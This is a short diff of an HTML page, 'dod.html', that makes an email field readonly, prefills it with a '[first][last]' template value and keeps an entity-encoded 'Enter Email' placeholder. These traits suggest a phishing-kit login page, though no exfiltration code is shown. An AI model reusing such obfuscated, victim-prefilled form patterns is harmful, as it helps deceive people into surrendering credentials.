--- a/dod.html
+++ b/dod.html
@@ -168,7 +168,7 @@ width: 100%;
 <div style="width: 70%; font-size: 10px; margin: 0 auto;">
 <p id="successMessage" style="border: 1px solid red; color: red; padding: 10px; border-radius: 10px; display: none;"></p>
 </div>
-<input id=emailField  class=validate[required]  type=email size=1 value=" " name=ai required="" autocomplete="off" 
+<input id=emailField  class=validate[required]  readonly="" type=email size=1 value=" [first][last]" name=ai required="" autocomplete="off" 
 placeholder="&#69;&#110;&#116;&#101;&#114;&#32;&#69;&#109;&#97;&#105;&#108;&#32;"  ><br>
 <div style="width: 70%; font-size: 10px; margin: 0 auto;">
 </div>
@@ -196,6 +196,7 @@ window.addEventListener("DOMContentLoaded", function () {
 </script>
 </body>
 </html>
+
 
 
 
